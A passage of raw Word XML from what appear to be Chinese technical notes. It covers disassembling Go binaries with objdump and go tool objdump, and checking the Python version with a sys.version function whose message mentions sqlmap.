      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://blog.haohtml.com/archives/20179</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   https://wwwonline.com/?p=1575</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A954E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092A88E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274AE931" w14:textId="2578C29E" w:rsidR="00253065" w:rsidRPr="00253065" w:rsidRDefault="00253065" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="389" w:name="_Toc159779840"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反编译</w:t>
      </w:r>
      <w:bookmarkEnd w:id="389"/>
    </w:p>
    <w:p w14:paraId="3FD27968" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C66C7FA" w14:textId="1F9AECE9" w:rsidR="00253065" w:rsidRDefault="002B561D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F64AD" w14:textId="5F04E7AB" w:rsidR="002B561D" w:rsidRDefault="002B561D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B561D">
        <w:t>https://juejin.cn/s/go%E8%AF%AD%E8%A8%80%E5%8F%8D%E7%BC%96%E8%AF%91%E5%B7%A5%E5%85%B7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCA5308" w14:textId="77777777" w:rsidR="00253065" w:rsidRDefault="00253065" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125296EF" w14:textId="76BAA090" w:rsidR="00A87BEC" w:rsidRDefault="00A87BEC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先将代码编译成二进制，命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7205A3" w14:textId="05750E84" w:rsidR="001C17EC" w:rsidRDefault="00A87BEC" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>go build --gcflags="-l -N" -o helloworld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F1CB3" w14:textId="1811C3D5" w:rsidR="001C17EC" w:rsidRPr="00A87BEC" w:rsidRDefault="00F57188" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F57188">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会生成一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F57188">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>helloworld</w:t>
      </w:r>
      <w:r w:rsidRPr="00F57188">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的二进制，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F57188">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--gcflags="-l -N"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F57188">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数的作用是去掉编译器优化，使生成的汇编代码与编写的代码更相近，同时也方便</w:t>
      </w:r>
      <w:r w:rsidRPr="00F57188">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F57188">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360CDABE" w14:textId="77777777" w:rsidR="001C17EC" w:rsidRDefault="001C17EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D12878" w14:textId="77777777" w:rsidR="00744D60" w:rsidRDefault="00744D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B7308F" w14:textId="77777777" w:rsidR="00744D60" w:rsidRDefault="00006CC2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="390" w:name="_Toc159779841"/>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反汇编成</w:t>
      </w:r>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AT&amp;T</w:t>
      </w:r>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汇编</w:t>
      </w:r>
      <w:bookmarkEnd w:id="390"/>
    </w:p>
    <w:p w14:paraId="26306B17" w14:textId="47ADEF03" w:rsidR="001C17EC" w:rsidRDefault="00006CC2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AT&amp;T</w:t>
      </w:r>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统最常用的汇编语言，</w:t>
      </w:r>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统提供的</w:t>
      </w:r>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w:r>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具也是将二进制反编译成</w:t>
      </w:r>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AT&amp;T</w:t>
      </w:r>
      <w:r w:rsidRPr="00006CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汇编，命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A891072" w14:textId="595743AA" w:rsidR="001C17EC" w:rsidRDefault="00006CC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008954A9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>objdump -d helloworld &gt; att.asm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6748BD01" w14:textId="77777777" w:rsidR="001C17EC" w:rsidRDefault="001C17EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C87B62A" w14:textId="77777777" w:rsidR="001C17EC" w:rsidRDefault="001C17EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C89507A" w14:textId="77777777" w:rsidR="00C74370" w:rsidRDefault="00C74370" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="391" w:name="_Toc159779842"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反汇编成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Plan 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汇编</w:t>
      </w:r>
      <w:bookmarkEnd w:id="391"/>
    </w:p>
    <w:p w14:paraId="4AE12C04" w14:textId="77777777" w:rsidR="00C74370" w:rsidRDefault="00C74370" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Plan 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前看到的只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言在用，而且网上的资料很匮乏，学习成本挺高的，但如果学会了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Plan 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汇编，再看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源码会非常简单，而且可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用汇编写出高效率代码。要把二进制反汇编成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Plan 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汇编，也只能用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的工具，命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D644B31" w14:textId="49B64908" w:rsidR="001C17EC" w:rsidRDefault="00C74370" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008954A9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go tool objdump -S helloworld &gt; plan9.asm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA559DC" w14:textId="77777777" w:rsidR="001C17EC" w:rsidRDefault="001C17EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11753C91" w14:textId="77777777" w:rsidR="001C17EC" w:rsidRDefault="001C17EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BCA095" w14:textId="3E8CDBCD" w:rsidR="002B561D" w:rsidRDefault="005A45BD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的插件，反编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码、伪代码，你作为一个反编译工程师，告诉我这段伪代码的含义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0993DE" w14:textId="216214D7" w:rsidR="005A45BD" w:rsidRDefault="005A45BD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chatGPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E8FE68" w14:textId="29B84DBD" w:rsidR="005A45BD" w:rsidRDefault="00574BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>penai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="005A45BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调</w:t>
      </w:r>
      <w:r w:rsidR="005A45BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E43A33B" w14:textId="77777777" w:rsidR="005A45BD" w:rsidRDefault="005A45BD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0907EBDA" w14:textId="77777777" w:rsidR="00253065" w:rsidRDefault="00253065" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E34BFA8" w14:textId="77777777" w:rsidR="00253065" w:rsidRDefault="00253065" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D03747A" w14:textId="77777777" w:rsidR="00253065" w:rsidRDefault="00253065" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="088857D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719D6F8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FCD3569" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9F8990" w14:textId="77777777" w:rsidR="002E0EE0" w:rsidRDefault="002E0EE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D58B9A0" w14:textId="77777777" w:rsidR="002E0EE0" w:rsidRDefault="002E0EE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E86D82F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="392" w:name="_Toc159779843"/>
      <w:r>
        <w:t>Pyhton</w:t>
      </w:r>
      <w:bookmarkEnd w:id="392"/>
    </w:p>
    <w:p w14:paraId="56205126" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D602FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="393" w:name="_Toc159779844"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Py2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Py3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="393"/>
    </w:p>
    <w:p w14:paraId="1D3D51C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5476AC56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="394" w:name="_Toc159779845"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sys.version</w:t>
      </w:r>
      <w:bookmarkEnd w:id="394"/>
    </w:p>
    <w:p w14:paraId="67BE3ACD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sys.version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2C954" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225262D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本校验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA6F5AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def version_check():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192BB555" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if sys.version.split()[0][0] == "2":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD83C4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # logger.error(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8DEED9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        #     "incompatible Python version detected ('{}'). To successfully run sqlmap you'll have to use version &gt;= 3.6 (visit 'https://www.python.org/downloads/')".format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3610E05C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        #         sys.version.split()[0]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407C07FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        logger.error(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714B0ADD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>('{}')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不兼容此系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，请升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;=3.6 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'https://www.python.org/downloads/'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)".format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ECA297" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                sys.version.split()[0]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2660AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        sys.exit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57EDA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E44A524" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="395" w:name="_Toc159779846"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>six</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区分</w:t>
      </w:r>
      <w:bookmarkEnd w:id="395"/>
    </w:p>
    <w:p w14:paraId="1A801386" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
